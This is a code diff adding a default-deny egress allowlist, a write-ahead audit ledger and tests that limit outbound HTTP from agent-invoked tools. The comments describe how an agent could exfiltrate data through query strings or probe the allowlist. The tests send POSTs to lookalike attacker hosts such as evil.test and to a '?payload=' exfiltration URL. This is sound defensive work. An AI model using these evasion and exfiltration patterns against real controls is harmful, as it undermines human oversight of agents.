@@ -84,8 +84,8 @@
     "The implementation would exceed named scope.",
     "Verification requires unnamed credentials, cost, destructive side effects, or policy approval.",
     "The same blocker repeats after reasonable investigation.",
-    "PR 6 cannot demonstrate a request issued from inside a real tool handler reaching the policy fetch; the 2026-07-25 spike proved the Fetch override only for a directly-provided effect, not through a running server whose handler context is captured at layer build.",
-    "PR 6 adds an agent-controllable outbound POST of workspace content; re-read that scope deliberately before landing rather than inheriting it as settled."
+    "DISCHARGED 2026-07-27 (PR 6): the policy Fetch reaches a request issued from inside a real dispatched MCP tool handler, measured with a falsification control; see history/pr6-fetch-reach-spike.md. The surviving invariant is that no middleware or request-scoped layer in a transport mounting governed tools may provide FetchHttpClient.Fetch, because request-time context takes precedence over the composition root.",
+    "Widening EPISTEMIC_EGRESS_DESTINATION_ALLOWLIST authorizes an agent-chosen POST of workspace content to that origin and everything beneath it; treat allowlist edits as security review, not configuration."
   ],
   "updated": "2026-07-27"
 }

--- a/packages/epistemic/server/package.json
+++ b/packages/epistemic/server/package.json
@@ -36,6 +36,7 @@
     "./ClaimDisposition": "./src/ClaimDisposition/index.ts",
     "./EdgeAuthority": "./src/EdgeAuthority/index.ts",
     "./ExecutionLedger": "./src/ExecutionLedger/index.ts",
+    "./GovernedEgress": "./src/GovernedEgress/index.ts",
     "./GovernedTierGate": "./src/GovernedTierGate/index.ts",
     "./internal/*": null,
     "./package.json": "./package.json"
@@ -49,6 +50,7 @@
   ],
   "sideEffects": [],
   "dependencies": {
+    "@beep/api-transport": "workspace:^",
     "@beep/epistemic-config": "workspace:^",
     "@beep/epistemic-domain": "workspace:^",
     "@beep/epistemic-tables": "workspace:^",

--- a/packages/epistemic/server/src/GovernedEgress/GovernedEgress.fetch.ts
+++ b/packages/epistemic/server/src/GovernedEgress/GovernedEgress.fetch.ts
@@ -1,0 +1,353 @@
+/**
+ * Governed egress: the destination boundary for outbound HTTP.
+ *
+ * This is the second enforcement surface of the execution-authority packet,
+ * and it answers a different question from the tier gate. The gate decides
+ * *whether a session may invoke an operation*; this decides *whether a request
+ * may reach a destination*. They are separate because `ToolCallRequest` carries
+ * the tool and nothing else — no parameters — so a gate physically cannot see
+ * the URL a tool intends to contact.
+ *
+ * It is installed as `FetchHttpClient.Fetch` rather than as an `HttpClient`
+ * wrapper on purpose: a driver that builds its own client from
+ * `FetchHttpClient.layer` would slip past a client-level wrapper, and the
+ * `Fetch` reference is the one seam every such driver still resolves through.
+ *
+ * **Two properties, and one honest limitation.**
+ *
+ * - **Default-deny by construction.** The allowlist defaults to empty, an empty
+ *   allowlist freezes an empty grant set, and an empty grant set denies every
+ *   destination. Reaching anything at all requires an operator to have named it.
+ * - **Write-ahead, like the gate.** The decision row is appended before the
+ *   request is issued, and a decision that cannot be written denies the request.
+ * - **Its records are not correlated to an MCP session.** `Fetch` is a plain
+ *   function returning a promise, so it has no fiber and therefore no
+ *   `CurrentMcpCaller`: this boundary cannot know which session provoked the
+ *   request. Its decisions are chained into their own run, keyed to the process
+ *   that built the layer, and an auditor correlates them to session rows by
+ *   time. Closing that gap needs a request-scoped seam that `Fetch` does not
+ *   have, and inferring the session from ambient state would reintroduce
+ *   exactly the cross-dispatch misattribution the gate's fiber correlation
+ *   exists to prevent.
+ *
+ * @packageDocumentation
+ * @category services
+ * @since 0.0.0
+ */
+
+import { EgressDenied } from "@beep/api-transport";
+import { EpistemicConfig, resolveSinkAudience } from "@beep/epistemic-config/server";
+import {
+  ExecutionGrant,
+  ExecutionSink,
+  GrantBudget,
+  GrantOperation,
+  GrantPurpose,
+  GrantResource,
+  SinkDestination,
+} from "@beep/epistemic-domain/values/ExecutionGrant";
+import {
+  destinationDigestOf,
+  digestForLedger,
+  ExecutionRunKey,
+  operationDigestOf,
+  sealExecutionDecision,
+} from "@beep/epistemic-domain/values/ExecutionRecord";
+import {
+  DenialReason,
+  denialGuidance,
+  ExecutionRequest,
+  ExecutionVerdict,
+} from "@beep/epistemic-domain/values/ExecutionVerdict";
+import { DraftGrantSet, evaluateExecutionRequest, freezeGrantSet } from "@beep/epistemic-domain/values/GrantSet";
+import { ExecutionLedger } from "@beep/epistemic-use-cases/ExecutionLedger";
+import { $EpistemicServerId } from "@beep/identity/packages";
+import { NonNegativeInt } from "@beep/schema";
+import { SystemPrincipal } from "@beep/shared-domain/entity/Principal";
+import { A, O } from "@beep/utils";
+import { DateTime, Duration, Effect, Ref, Semaphore } from "effect";
+import * as S from "effect/Schema";
+import * as Str from "effect/String";
+import type { DecisionRecordHash } from "@beep/epistemic-domain/values/ExecutionRecord";
+
+const $I = $EpistemicServerId.create("GovernedEgress/GovernedEgress.fetch");
+
+/**
+ * Session-static inputs the composition root supplies to the governed egress
+ * boundary. The destinations themselves are never passed here — they come from
+ * `EpistemicConfig`, so the allowlist has exactly one owner.
+ *
+ * @example
+ * ```ts
+ * import { GovernedEgressOptions } from "@beep/epistemic-server/GovernedEgress"
+ * import { GrantOperation, GrantPurpose, GrantResource } from "@beep/epistemic-domain/values/ExecutionGrant"
+ * import { Duration } from "effect"
+ *
+ * const options = GovernedEgressOptions.make({
+ *   grantTtl: Duration.hours(12),
+ *   operation: GrantOperation.make("http-egress"),
+ *   purpose: GrantPurpose.make("ontology-provenance-publication"),
+ *   resource: GrantResource.make("ontology-workspace")
+ * })
+ * console.log(options.operation)
+ * // "http-egress"
+ * ```
+ *
+ * @category models
+ * @since 0.0.0
+ */
+export class GovernedEgressOptions extends S.Class<GovernedEgressOptions>($I`GovernedEgressOptions`)(
+  {
+    grantTtl: S.Duration.annotateKey({
+      description: "Lifetime of the frozen egress grant set, measured from layer build.",
+    }),
+    operation: GrantOperation.annotateKey({
+      description: "Operation name recorded on every egress grant and decision.",
+    }),
+    purpose: GrantPurpose.annotateKey({
+      description: "Purpose recorded on every egress grant.",
+    }),
+    resource: GrantResource.annotateKey({
+      description: "Resource selector recorded on every egress grant.",
+    }),
+  },
+  $I.annote("GovernedEgressOptions", {
+    description: "Session-static inputs the composition root supplies to the governed egress boundary.",
+  })
+) {
+  static readonly is = S.is(GovernedEgressOptions);
+}
+
+const egressPrincipal = SystemPrincipal.make({ component: "Runtime", kind: "System" });
+
+// Canonical form for *coverage comparison*: origin plus path, with any trailing
+// slash removed and the query deliberately dropped — a query string must never
+// widen or narrow what an allowlist entry covers. Parsing through `URL` is what
+// makes the comparison safe: `https://allowed.example@evil.test/` and
+// `https://allowed.example:443` both normalize to the origin they actually
+// resolve to, not the one they read like.
+const canonicalize = (value: string): O.Option<string> => {
+  try {
+    const url = new URL(value);
+    return O.some(`${url.origin}${Str.replace(/\/+$/, "")(url.pathname)}`);
+  } catch {
+    return O.none();
+  }
+};
+
+// Canonical form for the *record*, which keeps the query and fragment. These
+// are dropped from coverage on purpose but must survive into the decision row:
+// an agent can carry a payload out in a query string under an allowed prefix,
+// and if the row named only the allowlist entry, that request would be
+// byte-identical in the ledger to a benign one. Only the digest is stored, so
+// recording the full form reveals nothing an auditor could not already see.
+const canonicalizeForRecord = (value: string): O.Option<string> => {
+  try {
+    const url = new URL(value);
+    return O.some(`${url.origin}${Str.replace(/\/+$/, "")(url.pathname)}${url.search}${url.hash}`);
+  } catch {
+    return O.none();
+  }
+};
+
+// An allowlist entry covers itself and everything beneath it, and nothing else.
+// The `/` boundary is the whole point: a bare `startsWith` would let
+// `https://allowed.example.evil.test` match an `https://allowed.example` entry.
+const coveredBy = (entry: string, requested: string): boolean =>
+  requested === entry || Str.startsWith(`${entry}/`)(requested);
+
+/**
+ * Build the governed egress `fetch`.
+ *
+ * Wraps `baseFetch` (defaulting to the platform `fetch`) with the destination
+ * check. An allowed destination is delegated; a denied one rejects with
+ * {@link EgressDenied}, which `HttpClient` surfaces as a `TransportError`
+ * carrying that error as its cause — the shape a consumer matches on to return
+ * its own typed refusal.
+ *
+ * The rejection is deliberately reason-free. Which of "not on the allowlist",
+ * "the grant expired", or "the ledger is down" produced it is written to the
+ * decision row and the server log; an agent that could tell them apart could
+ * map the allowlist by probing it.
+ *
+ * @example
+ * ```ts
+ * import { GovernedEgressOptions, makeGovernedEgressFetch } from "@beep/epistemic-server/GovernedEgress"
+ * import { GrantOperation, GrantPurpose, GrantResource } from "@beep/epistemic-domain/values/ExecutionGrant"
+ * import { Duration, Effect } from "effect"
+ *
+ * const fetch = makeGovernedEgressFetch(GovernedEgressOptions.make({
+ *   grantTtl: Duration.hours(12),
+ *   operation: GrantOperation.make("http-egress"),
+ *   purpose: GrantPurpose.make("ontology-provenance-publication"),
+ *   resource: GrantResource.make("ontology-workspace")
+ * }))
+ * console.log(Effect.isEffect(fetch))
+ * // true
+ * ```
+ *
+ * @category constructors
+ * @since 0.0.0
+ */
+export const makeGovernedEgressFetch = Effect.fn("Epistemic.GovernedEgress.make")(function* (
+  options: GovernedEgressOptions,
+  baseFetch?: typeof globalThis.fetch
+) {
+  const config = yield* EpistemicConfig;
+  const ledger = yield* ExecutionLedger;
+  const frozenAt = yield* DateTime.now;
+  const expiresAt = DateTime.add(frozenAt, { milliseconds: Duration.toMillis(options.grantTtl) });
+
+  // One grant per allowed destination. An entry that does not parse as a URL is
+  // dropped rather than granted: a malformed entry must never be able to buy
+  // authority, and the drop is logged so it is not silent.
+  const entries = A.getSomes(A.map(config.destinationAllowlist, canonicalize));
+  yield* A.length(entries) === A.length(config.destinationAllowlist)
+    ? Effect.void
+    : Effect.logWarning("governed egress dropped unparseable destination allowlist entries").pipe(
+        Effect.annotateLogs({
+          dropped: A.length(config.destinationAllowlist) - A.length(entries),
+          subsystem: "epistemic_governed_egress",
+        })
+      );
+
+  const grants = A.map(entries, (entry) => {
+    const destination = SinkDestination.make(entry);
+    return ExecutionGrant.make({
+      budget: GrantBudget.make({}),
+      expiresAt,
+      operation: options.operation,
+      policyRevision: config.policyRevision,
+      principal: egressPrincipal,
+      purpose: options.purpose,
+      resource: options.resource,
+      sink: ExecutionSink.make({
+        // Derived from the destination, never declared: a caller that could
+        // name its own audience would name the friendlier one.
+        audience: resolveSinkAudience(destination),
+        destination,
+        sinkClass: "network-egress",
+      }),
+    });
+  });
+  const frozen = freezeGrantSet(DraftGrantSet.make({ grants, policyRevision: config.policyRevision }), frozenAt);
+  const runKey = ExecutionRunKey.make(
+    digestForLedger(`epistemic-egress/${DateTime.toEpochMillis(frozenAt)}/${frozen.digest}`)
+  );
+  const chain = yield* Ref.make({ lastHash: O.none<DecisionRecordHash>(), nextSeq: 0 });
+  const lock = yield* Semaphore.make(1);
+
+  // Resolve the requested URL to the allowlist entry that covers it, so the
+  // evaluator's exact-match comparison stays exact. An uncovered URL is carried
+  // through as its own canonical form, which matches no grant and is therefore
+  // denied with the destination recorded as what was actually attempted.
+  const destinationFor = (requested: string): SinkDestination => {
+    const canonical = canonicalize(requested);
+    const covering = O.flatMap(canonical, (value) => A.findFirst(entries, (entry) => coveredBy(entry, value)));
+    return SinkDestination.make(O.getOrElse(covering, () => O.getOrElse(canonical, () => requested)));
+  };
+
+  const deny = (reason: DenialReason, destination: SinkDestination): Effect.Effect<boolean> =>
+    Effect.logWarning("governed egress refused a destination").pipe(
+      Effect.annotateLogs({
+        destinationDigest: destinationDigestOf(destination),
+        guidance: denialGuidance[reason],
+        reason,
+        subsystem: "epistemic_governed_egress",
+      }),
+      Effect.as(false)
+    );
+
+  const authorize = Effect.fn("Epistemic.GovernedEgress.authorize")(function* (requested: string) {
+    const now = yield* DateTime.now;
+    const destination = destinationFor(requested);
+    // The evaluator compares against the covering allowlist entry, but the row
+    // records what was actually asked for, query and all. Recording the entry
+    // would make an exfiltration under an allowed prefix
+    // (`.../publish?payload=…`) indistinguishable in the ledger from a benign
+    // publish to that same prefix.
+    const recordedDestination = SinkDestination.make(O.getOrElse(canonicalizeForRecord(requested), () => requested));
+    const request = ExecutionRequest.make({
+      destination,
+      operation: options.operation,
+      resolvedAudience: resolveSinkAudience(destination),
+      sinkClass: "network-egress",
+    });
+    const verdict = evaluateExecutionRequest(frozen, request, now, config.policyRevision);
+    return yield* lock.withPermit(
+      Effect.gen(function* () {
+        const state = yield* Ref.get(chain);
+        const common = {
+          audience: request.resolvedAudience,
+          decidedAt: now,
+          destinationDigest: destinationDigestOf(recordedDestination),
+          grantSetDigest: frozen.digest,
+          operationDigest: operationDigestOf(request.operation),
+          policyRevision: frozen.policyRevision,
+          prevHash: state.lastHash,
+          runKey,
+          seq: NonNegativeInt.make(state.nextSeq),
+          sinkClass: request.sinkClass,
+        };
+        const record = sealExecutionDecision(
+          ExecutionVerdict.match(verdict, {
+            allowed: () => ({ ...common, verdict: "allowed" as const }),
+            denied: ({ reason }) => ({ ...common, reason, verdict: "denied" as const }),
+          })
+        );
+        // Uninterruptible for the same reason the gate's append is: an
+        // interruption between a successful append and the chain advance would
+        // strand the run on a sequence slot the ledger already holds.
+        const appended = yield* Effect.uninterruptible(
+          ledger.appendDecision(record).pipe(
+            Effect.andThen(Ref.set(chain, { lastHash: O.some(record.hash), nextSeq: state.nextSeq + 1 })),
+            Effect.as(true),
+            Effect.catchCause((cause) =>
+              Effect.logError("governed egress could not write the write-ahead decision").pipe(
+                Effect.annotateLogs({ cause, subsystem: "epistemic_governed_egress" }),
+                Effect.as(false)
+              )
+            )
+          )
+        );
+        if (!appended) {
+          // No record, no request — the same fail-closed rule the gate applies.
+          return yield* deny(DenialReason.Enum["ledger-unavailable"], recordedDestination);
+        }
+        return yield* ExecutionVerdict.match(verdict, {
+          allowed: () => Effect.succeed(true),
+          denied: ({ reason }) => deny(reason, recordedDestination),
+        });
+      })
+    );
+  });
+
+  const platformFetch = baseFetch ?? globalThis.fetch;
+  // The authorization runs detached from whatever fiber called `fetch`, because
+  // `fetch` is a plain function and there is no fiber to inherit from. Running
+  // it *with* the build context is what keeps the boundary's own logs and spans
+  // inside the application's logger and tracer instead of a bare default
+  // runtime — the decision log is the only place a denial's reason survives.
+  const runAuthorize = Effect.runPromiseWith(yield* Effect.context<never>());
+
+  // `Fetch` is `typeof globalThis.fetch`, so the contract is a promise-returning
+  // function and this cannot be an Effect. It is written as a `.then` chain
+  // rather than an `async` function so the boundary needs no diagnostic
+  // suppression to exist.
+  //
+  // Redirects are refused rather than followed. `fetch` follows them by
+  // default, which would let an allowlisted destination hand the request to any
+  // host it likes *after* the check passed — the authorization would cover the
+  // first hop only. `error` makes the redirect itself the failure, so an
+  // operator who allowlists a host that redirects gets a broken publish rather
+  // than a silent one to somewhere they never named.
+  const governedFetch = (
+    input: Parameters<typeof globalThis.fetch>[0],
+    init?: Parameters<typeof globalThis.fetch>[1]
+  ): Promise<Response> =>
+    runAuthorize(authorize(input instanceof Request ? input.url : String(input))).then((allowed) =>
+      allowed ? platformFetch(input, { ...init, redirect: "error" }) : Promise.reject(EgressDenied.make({}))
+    );
+
+  return governedFetch as typeof globalThis.fetch;
+});

--- a/packages/epistemic/server/src/GovernedEgress/GovernedEgress.layer.ts
+++ b/packages/epistemic/server/src/GovernedEgress/GovernedEgress.layer.ts
@@ -1,0 +1,68 @@
+/**
+ * Governed egress layer factory.
+ *
+ * Produces the `FetchHttpClient.Fetch` reference, which is what makes this a
+ * boundary rather than a convention: every `HttpClient` built from
+ * `FetchHttpClient.layer` resolves that reference per request, including
+ * clients constructed inside drivers that otherwise seal their own transport.
+ *
+ * **Where this layer must be provided.** Into the graph that builds the
+ * `HttpClient` the governed handlers use. Measured behaviour (2026-07-27, see
+ * `goals/agent-execution-authority/history/pr6-fetch-reach-spike.md`):
+ * `HttpClient.layerMergedContext` captures its own build context and merges it
+ * with the request-time context at execute time, so the override rides with the
+ * client layer and reaches handlers whose own context never contains it.
+ *
+ * **What must not happen.** That same merge gives the *request-time* context
+ * precedence, so a `Fetch` provided per request silently displaces this one for
+ * every dispatch behind it. No middleware or request-scoped layer in a
+ * transport that mounts governed tools may provide `FetchHttpClient.Fetch`.
+ *
+ * @packageDocumentation
+ * @category layers
+ * @since 0.0.0
+ */
+
+import { Layer } from "effect";
+import * as FetchHttpClient from "effect/unstable/http/FetchHttpClient";
+import { makeGovernedEgressFetch } from "./GovernedEgress.fetch.ts";
+import type { EpistemicConfig } from "@beep/epistemic-config/server";
+import type { ExecutionLedger } from "@beep/epistemic-use-cases/ExecutionLedger";
+import type { GovernedEgressOptions } from "./GovernedEgress.fetch.ts";
+
+/**
+ * Build the governed egress `Fetch` layer from composition-root options.
+ *
+ * `baseFetch` exists for tests, which need to observe what the boundary let
+ * through without reaching the network. Production omits it and the platform
+ * `fetch` is used.
+ *
+ * @example
+ * ```ts
+ * import { GovernedEgressLive, GovernedEgressOptions } from "@beep/epistemic-server/GovernedEgress"
+ * import { GrantOperation, GrantPurpose, GrantResource } from "@beep/epistemic-domain/values/ExecutionGrant"
+ * import { Duration, Layer } from "effect"
+ *
+ * const egress = GovernedEgressLive(GovernedEgressOptions.make({
+ *   grantTtl: Duration.hours(12),
+ *   operation: GrantOperation.make("http-egress"),
+ *   purpose: GrantPurpose.make("ontology-provenance-publication"),
+ *   resource: GrantResource.make("ontology-workspace")
+ * }))
+ * console.log(Layer.isLayer(egress))
+ * // true
+ * ```
+ *
+ * @category layers
+ * @since 0.0.0
+ */
+// `Fetch` is a `Context.Reference`, and a Reference's identifier is `never` —
+// it always resolves, defaulting to the platform fetch — so this layer's output
+// type is `never`. That is exactly why the override is a policy decision and
+// not a type-checked requirement: nothing fails to compile when it is missing,
+// which is what the transport test exists to catch.
+export const GovernedEgressLive = (
+  options: GovernedEgressOptions,
+  baseFetch?: typeof globalThis.fetch
+): Layer.Layer<never, never, ExecutionLedger | EpistemicConfig> =>
+  Layer.effect(FetchHttpClient.Fetch, makeGovernedEgressFetch(options, baseFetch));

--- a/packages/epistemic/server/src/GovernedEgress/index.ts
+++ b/packages/epistemic/server/src/GovernedEgress/index.ts
@@ -1,0 +1,19 @@
+/**
+ * Governed egress exports.
+ *
+ * @packageDocumentation
+ * @since 0.0.0
+ */
+
+/**
+ * Governed egress fetch maker and options exports.
+ *
+ * @since 0.0.0
+ */
+export * from "./GovernedEgress.fetch.ts";
+/**
+ * Governed egress layer factory exports.
+ *
+ * @since 0.0.0
+ */
+export * from "./GovernedEgress.layer.ts";

--- a/packages/epistemic/server/src/index.ts
+++ b/packages/epistemic/server/src/index.ts
@@ -43,6 +43,13 @@ export * from "./EdgeAuthority/index.ts";
  */
 export * from "./ExecutionLedger/index.ts";
 /**
+ * Governed egress exports.
+ *
+ * @category services
+ * @since 0.0.0
+ */
+export * from "./GovernedEgress/index.ts";
+/**
  * Governed tier gate exports.
  *
  * @category services

--- a/packages/epistemic/server/test/GovernedEgress.test.ts
+++ b/packages/epistemic/server/test/GovernedEgress.test.ts
@@ -1,0 +1,261 @@
+import { EgressDenied } from "@beep/api-transport";
+import { defaultPolicyRevision, EpistemicConfig, EpistemicServerConfig } from "@beep/epistemic-config/server";
+import { fixtureAllowedDestination, testEpistemicConfig } from "@beep/epistemic-config/test";
+import {
+  GrantOperation,
+  GrantPurpose,
+  GrantResource,
+  SinkDestination,
+} from "@beep/epistemic-domain/values/ExecutionGrant";
+import { destinationDigestOf, verifyExecutionDecisionChain } from "@beep/epistemic-domain/values/ExecutionRecord";
+import { GovernedEgressOptions, makeGovernedEgressFetch } from "@beep/epistemic-server/GovernedEgress";
+import { ExecutionLedger, ExecutionLedgerUnavailable } from "@beep/epistemic-use-cases/ExecutionLedger";
+import { A } from "@beep/utils";
+import { describe, expect, it } from "@effect/vitest";
+import { Duration, Effect, Ref } from "effect";
+import type { ExecutionDecisionRecord, ExecutionOutcomeRecord } from "@beep/epistemic-domain/values/ExecutionRecord";
+
+const egressOptions = GovernedEgressOptions.make({
+  grantTtl: Duration.hours(12),
+  operation: GrantOperation.make("http-egress"),
+  purpose: GrantPurpose.make("ontology-provenance-publication"),
+  resource: GrantResource.make("ontology-workspace"),
+});
+
+const allowedUrl = `${fixtureAllowedDestination}/v1/publish`;
+
+interface Harness {
+  // A plain array rather than a Ref: the recorder is written from inside a
+  // promise-returning `fetch`, which has no fiber to run an Effect on.
+  readonly attempted: ReadonlyArray<string>;
+  readonly decisions: Ref.Ref<ReadonlyArray<ExecutionDecisionRecord>>;
+  readonly fetch: typeof globalThis.fetch;
+  readonly redirectModes: ReadonlyArray<string>;
+}
+
+// A test-local ledger stub for the same reason the gate suite has one: the
+// ledger's real guarantees are the database's, and this exists only to observe
+// what the boundary writes and to inject write failures.
+const makeHarness = Effect.fnUntraced(function* (options?: {
+  readonly config?: EpistemicServerConfig;
+  readonly contendAppends?: boolean;
+  readonly failDecisions?: boolean;
+}) {
+  const decisions = yield* Ref.make<ReadonlyArray<ExecutionDecisionRecord>>([]);
+  const attempted: Array<string> = [];
+  const stub = ExecutionLedger.of({
+    appendDecision: Effect.fn("GovernedEgressTest.appendDecision")(function* (record) {
+      if (options?.failDecisions === true) {
+        return yield* ExecutionLedgerUnavailable.during("appendDecision", "injected decision failure");
+      }
+      if (options?.contendAppends === true) {
+        // A yield point inside the append, not a timed sleep: `it.effect`
+        // installs a TestClock, so a sleep would never advance. Yielding hands
+        // the scheduler to the other in-flight authorizations, which is what
+        // widens an unserialized read window into a visible fork.
+        yield* Effect.yieldNow;
+      }
+      yield* Ref.update(decisions, A.append(record));
+    }),
+    appendOutcome: Effect.fn("GovernedEgressTest.appendOutcome")(function* () {}),
+    readDecisions: Effect.fn("GovernedEgressTest.readDecisions")(function* (runKey) {
+      return A.filter(yield* Ref.get(decisions), (record) => record.runKey === runKey);
+    }),
+    readOutcomes: Effect.fn("GovernedEgressTest.readOutcomes")(function* () {
+      return [] as ReadonlyArray<ExecutionOutcomeRecord>;
+    }),
+    readUnsettledAllowed: Effect.fn("GovernedEgressTest.readUnsettledAllowed")(function* () {
+      return [] as ReadonlyArray<ExecutionDecisionRecord>;
+    }),
+  });
+  // The base fetch records what the boundary let through and never reaches the
+  // network, so "allowed" is a positively observed fact rather than an absence
+  // of errors.
+  const redirectModes: Array<string> = [];
+  const baseFetch = ((input: RequestInfo | URL, requestInit?: RequestInit) => {
+    attempted.push(String(input));
+    redirectModes.push(String(requestInit?.redirect));
+    return Promise.resolve(new Response("delivered", { status: 200 }));
+  }) as typeof globalThis.fetch;
+  const fetch = yield* makeGovernedEgressFetch(egressOptions, baseFetch).pipe(
+    Effect.provideService(ExecutionLedger, stub),
+    Effect.provideService(EpistemicConfig, options?.config ?? testEpistemicConfig)
+  );
+  return { attempted, decisions, fetch, redirectModes } satisfies Harness;
+});
+
+const emptyAllowlistConfig = EpistemicServerConfig.make({
+  destinationAllowlist: [],
+  policyRevision: defaultPolicyRevision,
+});
+
+const attemptEgress = (harness: Harness, url: string) =>
+  Effect.promise(() =>
+    harness.fetch(url, { method: "POST" }).then(
+      (response) => ({ rejected: false, value: response as unknown }),
+      (thrown: unknown) => ({ rejected: true, value: thrown })
+    )
+  );
+
+// Scoped to the denied URL rather than asserting nothing was ever attempted,
+// so it stays honest in a test that also makes allowed requests.
+const expectDenied = Effect.fn("GovernedEgressTest.expectDenied")(function* (harness: Harness, url: string) {
+  const outcome = yield* attemptEgress(harness, url);
+  expect(outcome.rejected).toBe(true);
+  expect(A.contains(harness.attempted, url)).toBe(false);
+});
+
+describe("GovernedEgress", () => {
+  it.effect("delivers an allowlisted destination and records the allowed decision", () =>
+    Effect.gen(function* () {
+      const harness = yield* makeHarness();
+      const response = yield* Effect.promise(() => harness.fetch(allowedUrl, { method: "POST" }));
+
+      expect(response.status).toBe(200);
+      // The positive sibling fact: the request actually reached the base fetch.
+      expect(harness.attempted).toEqual([allowedUrl]);
+      const decisions = yield* Ref.get(harness.decisions);
+      expect(decisions).toHaveLength(1);
+      expect(decisions[0]!.verdict).toBe("allowed");
+      expect(decisions[0]!.sinkClass).toBe("network-egress");
+      expect(decisions[0]!.audience).toBe("external-network");
+      // The record names what was actually requested, not the allowlist entry
+      // that covered it.
+      expect(decisions[0]!.destinationDigest).toBe(destinationDigestOf(SinkDestination.make(allowedUrl)));
+      // Redirects are not followed: authorizing the first hop would otherwise
+      // authorize wherever that hop chose to send the request next.
+      expect(harness.redirectModes).toEqual(["error"]);
+    })
+  );
+
+  it.effect("denies every destination when the allowlist is empty", () =>
+    Effect.gen(function* () {
+      const harness = yield* makeHarness({ config: emptyAllowlistConfig });
+      yield* expectDenied(harness, allowedUrl);
+
+      const decisions = yield* Ref.get(harness.decisions);
+      expect(decisions).toHaveLength(1);
+      expect(decisions[0]!.verdict).toBe("denied");
+      expect(decisions[0]!.verdict === "denied" && decisions[0]!.reason).toBe("operation-not-granted");
+    })
+  );
+
+  it.effect("rejects with the reason-free EgressDenied error", () =>
+    Effect.gen(function* () {
+      const harness = yield* makeHarness();
+      const error = yield* Effect.promise(() =>
+        harness.fetch("https://not-allowed.example/publish", { method: "POST" }).then(
+          () => undefined,
+          (thrown: unknown) => thrown
+        )
+      );
+
+      expect(EgressDenied.is(error)).toBe(true);
+      // Field-free by construction: there is nothing on it for an agent to read.
+      expect(Object.keys(error as object).filter((key) => key !== "_tag")).toEqual([]);
+    })
+  );
+
+  it.effect("does not let a lookalike host borrow an allowlist entry's prefix", () =>
+    Effect.gen(function* () {
+      const harness = yield* makeHarness();
+      // `https://registry.example.evil.test` starts with the allowed entry's
+      // text. A prefix match without the `/` boundary would deliver it.
+      yield* expectDenied(harness, "https://registry.example.evil.test/publish");
+      // Userinfo that reads like the allowed host but resolves elsewhere.
+      yield* expectDenied(harness, "https://registry.example@evil.test/publish");
+
+      const decisions = yield* Ref.get(harness.decisions);
+      expect(A.map(decisions, (record) => record.verdict)).toEqual(["denied", "denied"]);
+      expect(decisions[0]!.destinationDigest).not.toBe(destinationDigestOf(fixtureAllowedDestination));
+    })
+  );
+
+  it.effect("refuses the request when the decision write fails", () =>
+    Effect.gen(function* () {
+      const harness = yield* makeHarness({ failDecisions: true });
+      // The destination is allowed; only the record is unavailable. No record,
+      // no request.
+      yield* expectDenied(harness, allowedUrl);
+      expect(yield* Ref.get(harness.decisions)).toHaveLength(0);
+    })
+  );
+
+  it.effect("chains its decisions into one verifiable run", () =>
+    Effect.gen(function* () {
+      const harness = yield* makeHarness();
+      yield* Effect.promise(() => harness.fetch(allowedUrl, { method: "POST" }));
+      yield* expectDenied(harness, "https://not-allowed.example/publish");
+      yield* Effect.promise(() => harness.fetch(allowedUrl, { method: "POST" }));
+
+      const decisions = yield* Ref.get(harness.decisions);
+      expect(A.map(decisions, (record) => record.seq)).toEqual([0, 1, 2]);
+      expect(A.map(decisions, (record) => record.verdict)).toEqual(["allowed", "denied", "allowed"]);
+      const runKey = decisions[0]!.runKey;
+      expect(A.every(decisions, (record) => record.runKey === runKey)).toBe(true);
+      expect(verifyExecutionDecisionChain(decisions, runKey).result).toBe("chain-intact");
+    })
+  );
+
+  it.effect("keeps the chain dense when many requests are authorized concurrently", () =>
+    Effect.gen(function* () {
+      // Each `fetch` call authorizes on its own detached fiber, so the ledger
+      // append and the chain advance are only serialized by the boundary's
+      // semaphore. A slow append widens any unserialized read window: without
+      // the permit, two requests read the same `nextSeq` and the chain forks.
+      const harness = yield* makeHarness({ contendAppends: true });
+      const urls = A.map(A.range(0, 19), (index) =>
+        index % 2 === 0 ? allowedUrl : `https://not-allowed-${index}.example/x`
+      );
+      yield* Effect.promise(() =>
+        Promise.all(A.map(urls, (url) => harness.fetch(url, { method: "POST" }).catch(() => undefined)))
+      );
+
+      const decisions = yield* Ref.get(harness.decisions);
+      expect(A.map(decisions, (record) => record.seq)).toEqual(A.map(A.range(0, 19), (index) => index));
+      const runKey = decisions[0]!.runKey;
+      expect(verifyExecutionDecisionChain(decisions, runKey).result).toBe("chain-intact");
+      // Exactly the allowed half was delivered — the denials did not merely
+      // fail to record, they failed to leave.
+      expect(harness.attempted).toHaveLength(10);
+    })
+  );
+
+  it.effect("distinguishes two allowed requests that differ only past the granted prefix", () =>
+    Effect.gen(function* () {
+      const harness = yield* makeHarness();
+      // Both are covered by the same allowlist entry, so both are allowed. The
+      // second is the exfiltration shape: a payload carried out in the query
+      // string of an otherwise legitimate destination. If the row named the
+      // covering entry, these two would be indistinguishable in the ledger and
+      // the record would be useless for reconstructing what left the machine.
+      yield* Effect.promise(() => harness.fetch(allowedUrl, { method: "POST" }));
+      const exfiltrating = `${allowedUrl}?payload=privileged-text`;
+      yield* Effect.promise(() => harness.fetch(exfiltrating, { method: "POST" }));
+
+      const decisions = yield* Ref.get(harness.decisions);
+      expect(A.map(decisions, (record) => record.verdict)).toEqual(["allowed", "allowed"]);
+      expect(decisions[1]!.destinationDigest).not.toBe(decisions[0]!.destinationDigest);
+      expect(decisions[1]!.destinationDigest).toBe(destinationDigestOf(SinkDestination.make(exfiltrating)));
+      // The query does not widen coverage either — it is dropped before the
+      // allowlist comparison, so it can neither buy nor lose authority.
+      expect(harness.attempted).toEqual([allowedUrl, exfiltrating]);
+    })
+  );
+
+  it.effect("drops an unparseable allowlist entry instead of granting it", () =>
+    Effect.gen(function* () {
+      const harness = yield* makeHarness({
+        config: EpistemicServerConfig.make({
+          destinationAllowlist: [SinkDestination.make("not a url"), fixtureAllowedDestination],
+          policyRevision: defaultPolicyRevision,
+        }),
+      });
+      yield* expectDenied(harness, "not a url");
+      // The parseable sibling still works, so the drop is targeted rather than
+      // a wholesale failure to build the grant set.
+      const response = yield* Effect.promise(() => harness.fetch(allowedUrl, { method: "POST" }));
+      expect(response.status).toBe(200);
+    })
+  );
+});

--- a/packages/epistemic/server/tsconfig.json
+++ b/packages/epistemic/server/tsconfig.json
@@ -27,6 +27,9 @@
       "path": "../use-cases/tsconfig.json"
     },
     {
+      "path": "../../foundation/capability/api-transport/tsconfig.json"
+    },
+    {
       "path": "../../foundation/capability/mcp-kit/tsconfig.json"
     },
     {

